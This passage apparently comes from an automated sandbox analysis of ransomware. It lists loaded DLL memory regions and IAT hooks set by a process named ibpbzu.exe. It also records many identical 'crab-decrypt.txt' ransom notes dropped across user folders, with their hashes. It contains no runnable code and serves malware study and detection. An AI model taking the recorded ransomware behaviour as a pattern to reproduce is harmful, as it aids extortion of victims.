urlmon.dll 0x73420000 0x735bbfff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x735c0000 0x7366cfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x73670000 0x73881fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x73890000 0x73b50fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x73b60000 0x73bf2fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73c00000 0x73c07fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73c10000 0x73c5dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73c60000 0x73c8efff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x73c90000 0x73ca4fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x73cb0000 0x73cd1fff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73ce0000 0x73cf7fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x73d00000 0x73d2efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x73d30000 0x73d42fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x73d50000 0x73e0efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73e10000 0x73e19fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73e20000 0x73e3ffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x73e40000 0x74077fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x740e0000 0x741d2fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x742d0000 0x75617fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75620000 0x75625fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x756f0000 0x75807fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x758a0000 0x75a61fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75a70000 0x75ad6fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75ae0000 0x75baffff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x75c60000 0x75c6dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x75c70000 0x75ce8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76110000 0x76134fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76140000 0x76184fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76190000 0x761d0fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x761e0000 0x76218fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76220000 0x76226fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76230000 0x7623dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76240000 0x762fcfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76300000 0x7643bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76440000 0x76460fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76610000 0x766a5fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x766b0000 0x76706fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x76710000 0x76c93fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76ca0000 0x76e1cfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76e20000 0x76e96fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x76ea0000 0x76eaffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77030000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x770f0000 0x77247fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x77250000 0x77294fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x772a0000 0x772b5fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x772c0000 0x7734bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77350000 0x774ddfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ffb2498ffff Private Memory Readable True False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb24b6b000 0x7ffb24b6b000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 304 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000007c0000:+0x1cb74 10. entry of ibpbzu.exe 4 bytes private_0x0000000000060000:+0x30732 now points to rpcrt4.dll:NdrGetTypeFlags+0x1bf12
IAT private_0x00000000007c0000:+0x1cb74 14. entry of ibpbzu.exe 4 bytes private_0x00000000007c0000:+0x601e5 now points to private_0x000000007fff0000:+0x4f8301e5
IAT private_0x00000000007c0000:+0x1cb74 15. entry of ibpbzu.exe 4 bytes private_0x00000000008c0000:+0x26c1a now points to private_0x000000007fff0000:+0x5a8f6c1a
IAT private_0x00000000007c0000:+0x1cb74 17. entry of ibpbzu.exe 4 bytes ibpbzu.exe:+0x12c130 now points to private_0x000000007fff0000:+0x5b53c130
IAT private_0x00000000007c0000:+0x1cb74 19. entry of ibpbzu.exe 4 bytes pagefile_0x0000000000d60000:+0x18c659 now points to private_0x000000007fff0000:+0x4fefc659
IAT private_0x00000000007c0000:+0x1cb74 20. entry of ibpbzu.exe 4 bytes pagefile_0x0000000000bd0000:+0x17c5cd now points to private_0x000000007fff0000:+0x46d5c5cd
IAT private_0x00000000007c0000:+0x1cb74 21. entry of ibpbzu.exe 4 bytes locale.nls:+0x24558 now points to private_0x000000007fff0000:+0x9594558
IAT private_0x00000000007c0000:+0x1cb74 22. entry of ibpbzu.exe 4 bytes pagefile_0x0000000000d60000:+0x3a9fc now points to private_0x000000007fff0000:+0xbdaa9fc
IAT private_0x00000000007c0000:+0x1cb74 25. entry of ibpbzu.exe 4 bytes pagefile_0x0000000000bd0000:+0x588d1 now points to private_0x000000007fff0000:+0xdc388d1
IAT private_0x00000000007c0000:+0x1cb74 26. entry of ibpbzu.exe 4 bytes private_0x00000000001c0000:+0x7ed1 now points to private_0x000000007fff0000:+0x191d7ed1
IAT private_0x00000000007c0000:+0x1cb74 29. entry of ibpbzu.exe 4 bytes pagefile_0x00000000009c0000:+0x11040c now points to private_0x000000007fff0000:+0x46ae040c
IAT private_0x00000000007c0000:+0x1cb74 33. entry of ibpbzu.exe 4 bytes private_0x00000000000a0000:+0x25605 now points to private_0x000000007fff0000:+0xb0d5605
IAT private_0x00000000007c0000:+0x1cb74 36. entry of ibpbzu.exe 4 bytes private_0x0000000000200000:+0x125d7d now points to private_0x000000007fff0000:+0x49335d7d
IAT private_0x00000000007c0000:+0x1cb74 37. entry of ibpbzu.exe 4 bytes private_0x00000000007c0000:+0x4c943 now points to private_0x000000007fff0000:+0x5481c943
IAT private_0x00000000007c0000:+0x1cb74 38. entry of ibpbzu.exe 4 bytes locale.nls:+0x85c50 now points to private_0x000000007fff0000:+0x615f5c50
IAT private_0x00000000007c0000:+0x1cb74 39. entry of ibpbzu.exe 4 bytes pagefile_0x0000000000bd0000:+0x8cdcf now points to private_0x000000007fff0000:+0x54c6cdcf
IAT private_0x00000000007c0000:+0x1cb74 40. entry of ibpbzu.exe 4 bytes pagefile_0x0000000000d60000:+0x9c7c6 now points to private_0x000000007fff0000:+0x43e0c7c6
IAT private_0x00000000007c0000:+0x1cb74 41. entry of ibpbzu.exe 4 bytes pagefile_0x0000000000bd0000:+0x118e57 now points to private_0x000000007fff0000:+0xcf8e57
IAT private_0x00000000007c0000:+0x1cb74 43. entry of ibpbzu.exe 4 bytes private_0x00000000000a0000:+0x57b5c now points to pagefile_0x0000000000d60000:+0x1397b5c
IAT private_0x00000000007c0000:+0x1cb74 46. entry of ibpbzu.exe 4 bytes ibpbzu.exe:+0x115ceb now points to private_0x000000007fff0000:+0x8525ceb
IAT private_0x00000000007c0000:+0x1cb74 47. entry of ibpbzu.exe 4 bytes private_0x00000000007c0000:+0xeff67 now points to private_0x000000007fff0000:+0x738bff67
IAT private_0x00000000007c0000:+0x1cb74 49. entry of ibpbzu.exe 4 bytes private_0x00000000000a0000:+0xb02af now points to private_0x000000007fff0000:+0x271602af
IAT private_0x00000000007c0000:+0x1cb74 50. entry of ibpbzu.exe 4 bytes private_0x00000000008c0000:+0x10ec3 now points to private_0x000000007fff0000:+0x768e0ec3
IAT private_0x00000000007c0000:+0x1cb74 54. entry of ibpbzu.exe 4 bytes ibpbzu.exe:+0x25782 now points to private_0x000000007fff0000:+0x1e435782
IAT private_0x00000000007c0000:+0x1cb74 59. entry of ibpbzu.exe 4 bytes private_0x00000000000a0000:+0x1604b now points to private_0x000000007fff0000:+0x6c0c604b
IAT private_0x00000000007c0000:+0x1cb74 61. entry of ibpbzu.exe 4 bytes pagefile_0x0000000000d60000:+0x238a13 now points to private_0x000000007fff0000:+0x1dfa8a13
IAT private_0x00000000007c0000:+0x1cb74 62. entry of ibpbzu.exe 4 bytes private_0x00000000008c0000:+0xb04fc now points to private_0x000000007fff0000:+0x489804fc
IAT private_0x00000000007c0000:+0x1cb74 64. entry of ibpbzu.exe 4 bytes private_0x00000000008c0000:+0xf06fa now points to private_0x000000007fff0000:+0x359c06fa
IAT private_0x00000000007c0000:+0x1cb74 65. entry of ibpbzu.exe 4 bytes private_0x00000000000a0000:+0x5130b now points to private_0x000000007fff0000:+0xf10130b
IAT private_0x00000000007c0000:+0x1cb74 70. entry of ibpbzu.exe 4 bytes ibpbzu.exe:+0xecd76 now points to private_0x000000007fff0000:+0x4f4fcd76
IAT private_0x00000000007c0000:+0x1cb74 72. entry of ibpbzu.exe 4 bytes ibpbzu.exe:+0xcc665 now points to private_0x000000007fff0000:+0x784dc665
IAT private_0x00000000007c0000:+0x1cb74 76. entry of ibpbzu.exe 4 bytes ibpbzu.exe:+0xad46a now points to private_0x000000007fff0000:+0x6a4bd46a
IAT private_0x00000000007c0000:+0x1cb74 80. entry of ibpbzu.exe 4 bytes pagefile_0x0000000000010000:+0xf367 now points to private_0x000000007fff0000:+0x7602f367
IAT private_0x00000000007c0000:+0x1cb74 83. entry of ibpbzu.exe 4 bytes ibpbzu.exe:+0xc8c0d now points to private_0x000000007fff0000:+0x7c4d8c0d
IAT private_0x00000000007c0000:+0x1cb74 84. entry of ibpbzu.exe 4 bytes private_0x0000000000060000:+0xf45a now points to private_0x000000007fff0000:+0x7707f45a
IAT private_0x00000000007c0000:+0x1cb74 86. entry of ibpbzu.exe 4 bytes locale.nls:+0x97dc1 now points to private_0x000000007fff0000:+0x7607dc1
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\esd\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\logs\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\local\virtualstore\program files\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\local\virtualstore\program files (x86)\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\collab\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\forms\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\jscache\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\security\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\acrobat\dc\security\crlcache\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\flash player\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\flash player\assetcache\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\flash player\assetcache\g7zd37y5\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\flash player\nativecache\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\headlights\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\linguistics\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\logtransport2\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\logtransport2\logs\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\sonar\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\adobe\sonar\sonar1.0\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\#sharedobjects\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\#sharedobjects\xcvudunh\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\#sharedobjects\xcvudunh\#appcontainer\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\#sharedobjects\xcvudunh\#appcontainer\aa.online-metrix.net\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\#sharedobjects\xcvudunh\#appcontainer\aa.online-metrix.net\fpc.swf\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\macromedia.com\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\macromedia.com\support\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\access\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\addins\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\credentials\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\crypto\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\crypto\rsa\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1051304884-625712362-2192934891-1000\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\document building blocks\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\document building blocks\1033\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\document building blocks\1033\16\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\excel\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\excel\xlstart\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\inputmethod\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\inputmethod\chs\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\internet explorer\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\internet explorer\quick launch\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\internet explorer\userdata\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
SHA1: 24b50140df9160e7979da3c80f63b51e04a92c43
SHA256: 9e1527eaa0937124bfac8c113068620e7aa84346be89852e6af7050985fa5f9c
False
c:\users\fd1hvy\appdata\roaming\microsoft\internet explorer\userdata\low\crab-decrypt.txt 4.19 KB MD5: e8f6b452de05919e2baeb615a5dfe297
